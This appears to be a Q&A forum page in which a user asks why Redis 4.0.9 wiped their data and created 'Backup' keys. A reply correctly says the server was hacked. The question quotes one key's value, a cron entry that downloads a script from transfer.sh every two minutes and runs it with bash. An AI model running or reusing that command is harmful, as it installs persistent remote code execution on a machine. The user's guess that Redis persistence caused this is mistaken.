Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

My Redis auto generated keys

Tags:

redis

ubuntu

I don't know what's exactly happen with my Redis version 4.0.9.

I'm running an application and using Redis to store my database.

But, then Redis auto create 3 new keys: "Backup1", "Backup2", "Backup3" and delete all of my data. Here is the screenshot of my redis: https://snag.gy/cyUZrg.jpg

By the way, the value of "Backup1" key is:

"\t\n*/2 * * * * curl -s https://transfer.sh/14lJBL/tmp.OiYASvlZ0v > .cmd && bash .cmd\n\t"

Thank you so much.

Update:

I found that this is the Persistence feature of Redis. I have tried to set save "" and appendonly no but it seems not work. my Redis persistence config.

Thanks, guys.

like image 823
Thanh Thai Nguyen Avatar asked Oct 15 '25 18:10

Thanh Thai Nguyen


1 Answers

There is not issue with redis 4.0.9. Your redis machine hacked. Hacker removed all your data from redis-server.

like image 148
Priyank Avatar answered Oct 18 '25 05:10

Priyank



Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!